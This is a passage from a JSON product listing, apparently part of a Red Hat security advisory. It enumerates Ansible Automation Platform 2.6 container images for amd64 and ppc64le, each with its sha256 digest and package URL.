"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3A2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484113"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcp-tools-rhel9@sha256%3A59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774268174"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9@sha256%3A5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774368903"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9-operator@sha256%3Aee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484033"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9@sha256%3A7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774258433"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3A2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484073"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3A4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484106"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9@sha256%3A01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774243862"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9-operator@sha256%3A7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484129"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel9@sha256%3A021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774139334"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9@sha256%3Aa0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774644659"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9-operator@sha256%3A1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484154"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel9@sha256%3Ad7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774647780"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel9@sha256%3A5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774487884"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel9@sha256%3A2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774490244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel9@sha256%3Ab77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774311517"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ee-supported-rhel9@sha256%3A21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774321273"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3A1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484549"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3Af0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774485790"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel9@sha256%3Acb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774573035"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcp-server-rhel9@sha256%3A2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview\u0026tag=1774268173"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel9@sha256%3A7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774139204"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel9@sha256%3A75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774153089"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3A8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774585183"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3A111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774417022"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9@sha256%3Adb0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774363040"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3A387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484113"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcp-tools-rhel9@sha256%3A7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774268174"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9@sha256%3A1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774368903"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9-operator@sha256%3A51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484033"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9@sha256%3Af720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774258433"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3A8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484073"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3Af95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484106"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9@sha256%3Aed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774243862"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9-operator@sha256%3A09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484129"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"product": {
